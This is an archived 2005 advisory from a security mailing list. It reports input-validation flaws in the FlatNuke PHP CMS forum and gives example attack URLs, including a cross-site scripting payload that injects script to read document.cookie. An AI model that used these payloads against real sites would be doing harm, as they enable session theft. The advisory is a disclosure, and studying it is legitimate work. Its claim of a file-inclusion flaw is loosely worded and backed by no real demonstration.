Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  File Including In PBLang

  [SA17333] phpESP Unspecified Cross-Site Scripting and SQL Injection

  [SA17353] gCards "limit" SQL Injection Vulnerability

  [Full-disclosure] Multiple vulnerabilities within RockLiffe MailSite Express WebMail

From:abducter_minds_(at)_yahoo.com <abducter_minds_(at)_yahoo.com>
Date:25.10.2005
Subject:File Including In FLAT NUKE

Class:  Input Validation Error  
CVE:  CVE-MAP-NOMATCH  
Remote:  Yes  
Local:  No  
Credit:  Abducter (ABDUCTER_MINDS@YAHOO.COM) Or (ABDUCTER_MINDS76@HOTMAIL.COM)
Vulnerable:  File Including In FLAT NUKE (ALL VERSION)

* info *
FLAT NUKE IS POWER PHP SITES SUPPORT HERE
http://flatnuke.sourceforge.net/flatnuke

* expliot *
http://www.victim.com/flatnuke/forum/index.php?op=profile&user=[abducter]
http://www.victim.com/flatnuke/forum/index.php?op=topic&quale=[abducter]
http://www.victim.com/flatnuke/forum/index.php?op=newtopic&mode=ris&quale
=
[abducter]&page=1
u must be login
u can see that
http://www.victim.com/flatnuke/forum/index.php?op=profile&user=%3Cscript%
3Ealert
(document.cookie);%3C/script%3E

* credit *
For all ARAB -EGYPT-
TO ALL MY FRIENDS IN WWW.S4A.CC
TO MY LOVE (N0N0)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru